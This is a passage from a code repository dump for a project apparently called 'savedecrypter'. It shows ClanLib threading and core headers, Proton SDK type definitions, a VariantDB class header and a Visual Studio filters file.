distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | class CL_Runnable; 33 | 34 | class CL_Thread_Impl 35 | { 36 | /// \name Construction 37 | /// \{ 38 | 39 | public: 40 | virtual ~CL_Thread_Impl() { return; } 41 | 42 | 43 | /// \} 44 | /// \name Attributes 45 | /// \{ 46 | 47 | public: 48 | 49 | 50 | /// \} 51 | /// \name Operations 52 | /// \{ 53 | 54 | public: 55 | virtual void start(CL_Runnable *runnable) = 0; 56 | 57 | virtual void join() = 0; 58 | 59 | 60 | /// \} 61 | /// \name Implementation 62 | /// \{ 63 | 64 | private: 65 | /// \} 66 | }; 67 | 68 | 69 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/thread_local_storage_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Harry Storbacka 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "API/Core/System/sharedptr.h" 33 | #include 34 | 35 | class CL_ThreadLocalStorage_Impl 36 | { 37 | /// \name Construction 38 | /// \{ 39 | 40 | public: 41 | CL_ThreadLocalStorage_Impl(); 42 | 43 | private: 44 | ~CL_ThreadLocalStorage_Impl(); 45 | 46 | 47 | /// \} 48 | /// \name Attributes 49 | /// \{ 50 | 51 | public: 52 | CL_UnknownSharedPtr get_variable(const CL_StringRef &name); 53 | 54 | 55 | /// \} 56 | /// \name Operations 57 | /// \{ 58 | 59 | public: 60 | void set_variable(const CL_StringRef &name, CL_UnknownSharedPtr ptr); 61 | 62 | void add_reference(); 63 | 64 | void release_reference(); 65 | 66 | 67 | /// \} 68 | /// \name Implementation 69 | /// \{ 70 | 71 | protected: 72 | int reference_count; 73 | 74 | std::map data; 75 | /// \} 76 | }; 77 | 78 | 79 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/core_global.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Mark Page 27 | */ 28 | 29 | #pragma once 30 | 31 | #include "Core/precomp.h" 32 | 33 | #include "API/Core/System/thread_local_storage.h" 34 | 35 | // This class controls the destruction order of clanCore global variables 36 | // This class MUST be a singleton, created in core_global.cpp 37 | 38 | class CL_ThreadLocalStorage; 39 | class CL_CoreGlobal; 40 | extern CL_CoreGlobal cl_core_global; 41 | 42 | class CL_CoreGlobal 43 | { 44 | public: 45 | CL_CoreGlobal(); 46 | ~CL_CoreGlobal(); 47 | 48 | private: 49 | friend class CL_ThreadLocalStorage; 50 | 51 | // These cl_tls_ variables are used by System/thread_local_storage.cpp 52 | #ifdef WIN32 53 | CL_Mutex cl_tls_mutex; 54 | DWORD cl_tls_index; 55 | #elif !defined(HAVE_TLS) 56 | CL_Mutex cl_tls_mutex; 57 | bool cl_tls_index_created; 58 | pthread_key_t cl_tls_index; 59 | #else 60 | static __thread CL_ThreadLocalStorage_Impl *cl_tls_impl; 61 | #endif 62 | 63 | CL_ThreadLocalStorage *cl_tls ; 64 | 65 | protected: 66 | void destroy_tls(); 67 | }; 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/precomp.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #include "Core/precomp.h" 31 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/precomp.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #ifdef WIN32 33 | #ifdef _MSC_VER 34 | # pragma warning (disable:4786) 35 | #endif 36 | #include 37 | #include 38 | #endif 39 | 40 | #include "API/Core/Text/string_types.h" 41 | #include "API/Core/System/exception.h" 42 | 43 | #ifdef __BORLANDC__ 44 | #define BAD_MATH 45 | #endif 46 | 47 | #ifdef BAD_MATH 48 | #define sqrtf sqrt 49 | #define acosf acos 50 | #define sinf sin 51 | #define cosf cos 52 | #endif 53 | 54 | #if defined(_DEBUG) && !defined(DEBUG) 55 | #define DEBUG 56 | #endif 57 | 58 | #ifdef WIN32 59 | #define BREAKPOINT 60 | #else 61 | #define BREAKPOINT asm("int $03"); 62 | #endif 63 | 64 | 65 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/proton/plat.h: -------------------------------------------------------------------------------- 1 | #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS 2 | #pragma once 3 | 4 | #ifndef M_PI 5 | #define M_PI 3.141592f 6 | #endif 7 | /* The following definitions are the same across platforms. This first 8 | ** group are the sanctioned types. 9 | */ 10 | #ifndef _BOOLEAN_DEFINED 11 | typedef unsigned char boolean; /* Boolean value type. */ 12 | #define _BOOLEAN_DEFINED 13 | #endif 14 | 15 | #ifndef _UINT32_DEFINED 16 | typedef unsigned long int uint32; /* Unsigned 32 bit value */ 17 | #define _UINT32_DEFINED 18 | #endif 19 | 20 | #ifndef _UINT16_DEFINED 21 | typedef unsigned short uint16; /* Unsigned 16 bit value */ 22 | #define _UINT16_DEFINED 23 | #endif 24 | 25 | #ifndef _UINT8_DEFINED 26 | typedef unsigned char uint8; /* Unsigned 8 bit value */ 27 | #define _UINT8_DEFINED 28 | #endif 29 | 30 | #ifndef _INT32_DEFINED 31 | typedef signed long int int32; /* Signed 32 bit value */ 32 | 33 | //for mysql 34 | #define HAVE_INT32 35 | 36 | #define _INT32_DEFINED 37 | #endif 38 | 39 | #ifndef _INT16_DEFINED 40 | typedef signed short int16; /* Signed 16 bit value */ 41 | #define _INT16_DEFINED 42 | #endif 43 | 44 | #ifndef _INT8_DEFINED 45 | typedef signed char int8; /* Signed 8 bit value */ 46 | #define _INT8_DEFINED 47 | #endif 48 | 49 | #if defined(__GNUC__) 50 | #define __int64 long long 51 | #endif 52 | 53 | #ifndef _UINT64_DEFINED 54 | typedef unsigned __int64 uint64; /* Unsigned 64 bit value */ 55 | #define _UINT64_DEFINED 56 | #endif 57 | 58 | #ifndef _INT64_DEFINED 59 | typedef __int64 int64; /* Signed 64 bit value */ 60 | #define _INT64_DEFINED 61 | #endif 62 | 63 | #ifndef _SINT64_DEFINED 64 | typedef __int64 sint64; /* Signed 64 bit value */ 65 | #define _SINT64_DEFINED 66 | #endif 67 | 68 | #ifndef _BYTE_DEFINED 69 | typedef unsigned char byte; /* byte type */ 70 | #define _BYTE_DEFINED 71 | #endif 72 | 73 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/proton/vardb.h: -------------------------------------------------------------------------------- 1 | // *************************************************************** 2 | // SharedDB - Creation date: 04/11/2009 3 | // ------------------------------------------------------------- 4 | // Robinson Technologies Copyright (C) 2009 - All Rights Reserved 5 | // 6 | // *************************************************************** 7 | // Programmer(s): Seth A. Robinson (seth@rtsoft.com) 8 | // *************************************************************** 9 | #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS 10 | #ifndef VariantDB_h__ 11 | #define VariantDB_h__ 12 | #include "Variant.hpp" 13 | #include 14 | 15 | //modified so msvc2015 will compile, from hisadg123 16 | #if _MSC_VER >= 1700 17 | #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS 18 | #endif 19 | class Variant; 20 | typedef stdext::hash_map dataList; 21 | using namespace std; 22 | class VariantDB 23 | { 24 | public: 25 | VariantDB(); 26 | virtual ~VariantDB(); 27 | 28 | 29 | Variant* GetVar(const string& keyName); //created it needed, this is usually what you want 30 | Variant* GetVarIfExists(const string& keyName); //returns null if not created yet 31 | Variant* GetVarWithDefault(const string& keyName, const Variant& vDefault); 32 | 33 | bool Load(const string& fileName, bool* pFileExistedOut = NULL, bool bAddBasePath = true); 34 | 35 | string DumpAsString(); 36 | void DeleteAll(); 37 | int GetVarCount() { return (int)m_data.size(); } 38 | 39 | void Clear(); 40 | //to get each var in our db manually, do this: 41 | void ResetNext(); //call before starting a search 42 | Variant* GetNext(string& keyOut); //call this in a loop until it returns NULL to signal the finish, callResetNext() before using! 43 | 44 | VariantDB& operator= (const VariantDB& rhs) 45 | { 46 | //m_functionData = rhs.m_functionData; 47 | dataList::const_iterator itor = rhs.m_data.begin(); 48 | 49 | while (itor != rhs.m_data.end()) 50 | { 51 | m_data[itor->first] = new Variant(*itor->second); 52 | itor++; 53 | } 54 | return *this; 55 | } 56 | 57 | VariantDB(const VariantDB& ref) 58 | { 59 | *this = ref; 60 | } 61 | 62 | private: 63 | 64 | dataList m_data; 65 | dataList::iterator m_nextItor; 66 | }; 67 | 68 | #endif // Variant_h__ 69 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/savedecrypter.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {2b49b9ae-c938-4fbe-9e5d-7e03e3441c8e} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files\proton 26 | 27 | 28 | Source Files\proton 29 | 30 | 31 | 32 | 33 | Source Files\proton 34 | 35 | 36 | Source Files\proton 37 | 38 | 39 | Source Files\proton 40 | 41 | 42 | Source Files\proton 43 | 44 | 45 | --------------------------------------------------------------------------------